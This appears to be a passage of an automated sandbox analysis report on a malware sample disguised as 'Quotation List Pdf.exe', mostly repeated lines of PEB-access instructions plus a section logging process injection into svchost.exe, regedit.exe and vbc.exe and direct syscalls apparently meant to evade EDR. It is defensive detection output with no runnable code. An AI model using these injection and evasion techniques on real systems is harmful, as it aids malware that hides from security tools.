            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058351EF mov eax, dword ptr fs:[00000030h]5_2_058351EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058351EF mov eax, dword ptr fs:[00000030h]5_2_058351EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058351EF mov eax, dword ptr fs:[00000030h]5_2_058351EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058351EF mov eax, dword ptr fs:[00000030h]5_2_058351EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058351EF mov eax, dword ptr fs:[00000030h]5_2_058351EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058351EF mov eax, dword ptr fs:[00000030h]5_2_058351EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058351EF mov eax, dword ptr fs:[00000030h]5_2_058351EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058351EF mov eax, dword ptr fs:[00000030h]5_2_058351EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058351EF mov eax, dword ptr fs:[00000030h]5_2_058351EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058351EF mov eax, dword ptr fs:[00000030h]5_2_058351EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058351EF mov eax, dword ptr fs:[00000030h]5_2_058351EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058351EF mov eax, dword ptr fs:[00000030h]5_2_058351EF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058151ED mov eax, dword ptr fs:[00000030h]5_2_058151ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058401F8 mov eax, dword ptr fs:[00000030h]5_2_058401F8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058BA118 mov ecx, dword ptr fs:[00000030h]5_2_058BA118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058BA118 mov eax, dword ptr fs:[00000030h]5_2_058BA118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058BA118 mov eax, dword ptr fs:[00000030h]5_2_058BA118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058BA118 mov eax, dword ptr fs:[00000030h]5_2_058BA118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058D0115 mov eax, dword ptr fs:[00000030h]5_2_058D0115
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05840124 mov eax, dword ptr fs:[00000030h]5_2_05840124
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05811131 mov eax, dword ptr fs:[00000030h]5_2_05811131
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05811131 mov eax, dword ptr fs:[00000030h]5_2_05811131
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0580B136 mov eax, dword ptr fs:[00000030h]5_2_0580B136
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0580B136 mov eax, dword ptr fs:[00000030h]5_2_0580B136
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0580B136 mov eax, dword ptr fs:[00000030h]5_2_0580B136
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0580B136 mov eax, dword ptr fs:[00000030h]5_2_0580B136
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05809148 mov eax, dword ptr fs:[00000030h]5_2_05809148
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05809148 mov eax, dword ptr fs:[00000030h]5_2_05809148
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05809148 mov eax, dword ptr fs:[00000030h]5_2_05809148
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05809148 mov eax, dword ptr fs:[00000030h]5_2_05809148
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058A4144 mov eax, dword ptr fs:[00000030h]5_2_058A4144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058A4144 mov eax, dword ptr fs:[00000030h]5_2_058A4144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058A4144 mov ecx, dword ptr fs:[00000030h]5_2_058A4144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058A4144 mov eax, dword ptr fs:[00000030h]5_2_058A4144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058A4144 mov eax, dword ptr fs:[00000030h]5_2_058A4144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05817152 mov eax, dword ptr fs:[00000030h]5_2_05817152
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05816154 mov eax, dword ptr fs:[00000030h]5_2_05816154
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05816154 mov eax, dword ptr fs:[00000030h]5_2_05816154
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0580C156 mov eax, dword ptr fs:[00000030h]5_2_0580C156
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058E5152 mov eax, dword ptr fs:[00000030h]5_2_058E5152
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0580F172 mov eax, dword ptr fs:[00000030h]5_2_0580F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0580F172 mov eax, dword ptr fs:[00000030h]5_2_0580F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0580F172 mov eax, dword ptr fs:[00000030h]5_2_0580F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0580F172 mov eax, dword ptr fs:[00000030h]5_2_0580F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0580F172 mov eax, dword ptr fs:[00000030h]5_2_0580F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0580F172 mov eax, dword ptr fs:[00000030h]5_2_0580F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0580F172 mov eax, dword ptr fs:[00000030h]5_2_0580F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0580F172 mov eax, dword ptr fs:[00000030h]5_2_0580F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0580F172 mov eax, dword ptr fs:[00000030h]5_2_0580F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0580F172 mov eax, dword ptr fs:[00000030h]5_2_0580F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0580F172 mov eax, dword ptr fs:[00000030h]5_2_0580F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0580F172 mov eax, dword ptr fs:[00000030h]5_2_0580F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0580F172 mov eax, dword ptr fs:[00000030h]5_2_0580F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0580F172 mov eax, dword ptr fs:[00000030h]5_2_0580F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0580F172 mov eax, dword ptr fs:[00000030h]5_2_0580F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0580F172 mov eax, dword ptr fs:[00000030h]5_2_0580F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0580F172 mov eax, dword ptr fs:[00000030h]5_2_0580F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0580F172 mov eax, dword ptr fs:[00000030h]5_2_0580F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0580F172 mov eax, dword ptr fs:[00000030h]5_2_0580F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0580F172 mov eax, dword ptr fs:[00000030h]5_2_0580F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0580F172 mov eax, dword ptr fs:[00000030h]5_2_0580F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058A9179 mov eax, dword ptr fs:[00000030h]5_2_058A9179
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0581208A mov eax, dword ptr fs:[00000030h]5_2_0581208A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0580D08D mov eax, dword ptr fs:[00000030h]5_2_0580D08D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0583D090 mov eax, dword ptr fs:[00000030h]5_2_0583D090
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0583D090 mov eax, dword ptr fs:[00000030h]5_2_0583D090
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05815096 mov eax, dword ptr fs:[00000030h]5_2_05815096
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0584909C mov eax, dword ptr fs:[00000030h]5_2_0584909C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058D60B8 mov eax, dword ptr fs:[00000030h]5_2_058D60B8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058D60B8 mov ecx, dword ptr fs:[00000030h]5_2_058D60B8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058270C0 mov eax, dword ptr fs:[00000030h]5_2_058270C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058270C0 mov ecx, dword ptr fs:[00000030h]5_2_058270C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058270C0 mov ecx, dword ptr fs:[00000030h]5_2_058270C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058270C0 mov eax, dword ptr fs:[00000030h]5_2_058270C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058270C0 mov ecx, dword ptr fs:[00000030h]5_2_058270C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058270C0 mov ecx, dword ptr fs:[00000030h]5_2_058270C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058270C0 mov eax, dword ptr fs:[00000030h]5_2_058270C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058270C0 mov eax, dword ptr fs:[00000030h]5_2_058270C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058270C0 mov eax, dword ptr fs:[00000030h]5_2_058270C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058270C0 mov eax, dword ptr fs:[00000030h]5_2_058270C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058270C0 mov eax, dword ptr fs:[00000030h]5_2_058270C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058270C0 mov eax, dword ptr fs:[00000030h]5_2_058270C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058270C0 mov eax, dword ptr fs:[00000030h]5_2_058270C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058270C0 mov eax, dword ptr fs:[00000030h]5_2_058270C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058270C0 mov eax, dword ptr fs:[00000030h]5_2_058270C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058270C0 mov eax, dword ptr fs:[00000030h]5_2_058270C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058270C0 mov eax, dword ptr fs:[00000030h]5_2_058270C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058270C0 mov eax, dword ptr fs:[00000030h]5_2_058270C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058920DE mov eax, dword ptr fs:[00000030h]5_2_058920DE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058E50D9 mov eax, dword ptr fs:[00000030h]5_2_058E50D9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058390DB mov eax, dword ptr fs:[00000030h]5_2_058390DB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0580A0E3 mov ecx, dword ptr fs:[00000030h]5_2_0580A0E3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058350E4 mov eax, dword ptr fs:[00000030h]5_2_058350E4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058350E4 mov ecx, dword ptr fs:[00000030h]5_2_058350E4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058180E9 mov eax, dword ptr fs:[00000030h]5_2_058180E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0580C0F0 mov eax, dword ptr fs:[00000030h]5_2_0580C0F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058520F0 mov ecx, dword ptr fs:[00000030h]5_2_058520F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0582E016 mov eax, dword ptr fs:[00000030h]5_2_0582E016
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0582E016 mov eax, dword ptr fs:[00000030h]5_2_0582E016
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0582E016 mov eax, dword ptr fs:[00000030h]5_2_0582E016
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0582E016 mov eax, dword ptr fs:[00000030h]5_2_0582E016
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0580A020 mov eax, dword ptr fs:[00000030h]5_2_0580A020
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0580C020 mov eax, dword ptr fs:[00000030h]5_2_0580C020
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058D903E mov eax, dword ptr fs:[00000030h]5_2_058D903E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058D903E mov eax, dword ptr fs:[00000030h]5_2_058D903E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058D903E mov eax, dword ptr fs:[00000030h]5_2_058D903E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058D903E mov eax, dword ptr fs:[00000030h]5_2_058D903E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05812050 mov eax, dword ptr fs:[00000030h]5_2_05812050
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0583B052 mov eax, dword ptr fs:[00000030h]5_2_0583B052
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058B705E mov ebx, dword ptr fs:[00000030h]5_2_058B705E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058B705E mov eax, dword ptr fs:[00000030h]5_2_058B705E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058E5060 mov eax, dword ptr fs:[00000030h]5_2_058E5060
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0583C073 mov eax, dword ptr fs:[00000030h]5_2_0583C073
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05821070 mov eax, dword ptr fs:[00000030h]5_2_05821070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05821070 mov ecx, dword ptr fs:[00000030h]5_2_05821070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05821070 mov eax, dword ptr fs:[00000030h]5_2_05821070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05821070 mov eax, dword ptr fs:[00000030h]5_2_05821070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05821070 mov eax, dword ptr fs:[00000030h]5_2_05821070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05821070 mov eax, dword ptr fs:[00000030h]5_2_05821070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05821070 mov eax, dword ptr fs:[00000030h]5_2_05821070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05821070 mov eax, dword ptr fs:[00000030h]5_2_05821070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05821070 mov eax, dword ptr fs:[00000030h]5_2_05821070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05821070 mov eax, dword ptr fs:[00000030h]5_2_05821070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05821070 mov eax, dword ptr fs:[00000030h]5_2_05821070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05821070 mov eax, dword ptr fs:[00000030h]5_2_05821070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05821070 mov eax, dword ptr fs:[00000030h]5_2_05821070
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0580E388 mov eax, dword ptr fs:[00000030h]5_2_0580E388
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0580E388 mov eax, dword ptr fs:[00000030h]5_2_0580E388
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0580E388 mov eax, dword ptr fs:[00000030h]5_2_0580E388
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0583438F mov eax, dword ptr fs:[00000030h]5_2_0583438F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0583438F mov eax, dword ptr fs:[00000030h]5_2_0583438F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058E539D mov eax, dword ptr fs:[00000030h]5_2_058E539D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05808397 mov eax, dword ptr fs:[00000030h]5_2_05808397
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05808397 mov eax, dword ptr fs:[00000030h]5_2_05808397
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05808397 mov eax, dword ptr fs:[00000030h]5_2_05808397
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0586739A mov eax, dword ptr fs:[00000030h]5_2_0586739A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0586739A mov eax, dword ptr fs:[00000030h]5_2_0586739A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058433A0 mov eax, dword ptr fs:[00000030h]5_2_058433A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058433A0 mov eax, dword ptr fs:[00000030h]5_2_058433A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058333A5 mov eax, dword ptr fs:[00000030h]5_2_058333A5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058CC3CD mov eax, dword ptr fs:[00000030h]5_2_058CC3CD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0581A3C0 mov eax, dword ptr fs:[00000030h]5_2_0581A3C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0581A3C0 mov eax, dword ptr fs:[00000030h]5_2_0581A3C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0581A3C0 mov eax, dword ptr fs:[00000030h]5_2_0581A3C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0581A3C0 mov eax, dword ptr fs:[00000030h]5_2_0581A3C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0581A3C0 mov eax, dword ptr fs:[00000030h]5_2_0581A3C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0581A3C0 mov eax, dword ptr fs:[00000030h]5_2_0581A3C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058183C0 mov eax, dword ptr fs:[00000030h]5_2_058183C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058183C0 mov eax, dword ptr fs:[00000030h]5_2_058183C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058183C0 mov eax, dword ptr fs:[00000030h]5_2_058183C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058183C0 mov eax, dword ptr fs:[00000030h]5_2_058183C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058CB3D0 mov ecx, dword ptr fs:[00000030h]5_2_058CB3D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058CF3E6 mov eax, dword ptr fs:[00000030h]5_2_058CF3E6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058203E9 mov eax, dword ptr fs:[00000030h]5_2_058203E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058203E9 mov eax, dword ptr fs:[00000030h]5_2_058203E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_058203E9 mov eax, dword ptr fs:[00000030h]5_2_058203E9
            Source: C:\Users\user\Desktop\Quotation List Pdf.exeCode function: 0_2_00007FF768438130 RtlAddVectoredExceptionHandler,RaiseFailFastException,0_2_00007FF768438130
            Source: C:\Users\user\Desktop\Quotation List Pdf.exeCode function: 0_2_00007FF76849B70C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF76849B70C

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Allocates memory in foreign processes
            Source: C:\Users\user\Desktop\Quotation List Pdf.exeMemory allocated: C:\Windows\System32\svchost.exe base: 400000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\Quotation List Pdf.exeMemory allocated: C:\Windows\regedit.exe base: 400000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\Quotation List Pdf.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 protect: page execute and read and writeJump to behavior
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exeNtCreateMutant: Direct from: 0x774635CCJump to behavior
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exeNtWriteVirtualMemory: Direct from: 0x77462E3CJump to behavior
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exeNtMapViewOfSection: Direct from: 0x77462D1CJump to behavior
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exeNtResumeThread: Direct from: 0x774636ACJump to behavior
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exeNtProtectVirtualMemory: Direct from: 0x77462F9CJump to behavior
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exeNtSetInformationProcess: Direct from: 0x77462C5CJump to behavior
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exeNtSetInformationThread: Direct from: 0x774563F9Jump to behavior
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exeNtClose: Direct from: 0x77457B2E
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exeNtNotifyChangeKey: Direct from: 0x77463C2CJump to behavior
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exeNtAllocateVirtualMemory: Direct from: 0x77462BFCJump to behavior
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exeNtQueryInformationProcess: Direct from: 0x77462C26Jump to behavior
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exeNtResumeThread: Direct from: 0x77462FBCJump to behavior
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exeNtReadFile: Direct from: 0x77462ADCJump to behavior
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exeNtQuerySystemInformation: Direct from: 0x77462DFCJump to behavior
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exeNtDelayExecution: Direct from: 0x77462DDCJump to behavior
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exeNtAllocateVirtualMemory: Direct from: 0x77463C9CJump to behavior
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exeNtClose: Direct from: 0x77462B6C
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exeNtCreateUserProcess: Direct from: 0x7746371CJump to behavior
            Source: C:\Program Files (x86)\imKjXZcdkPvaNBmohymPyGBpYqHlJGFXfRwQSYwktKdQathTVR\tiwTBKVufjvhPL.exeNtWriteVirtualMemory: Direct from: 0x7746490CJump to behavior
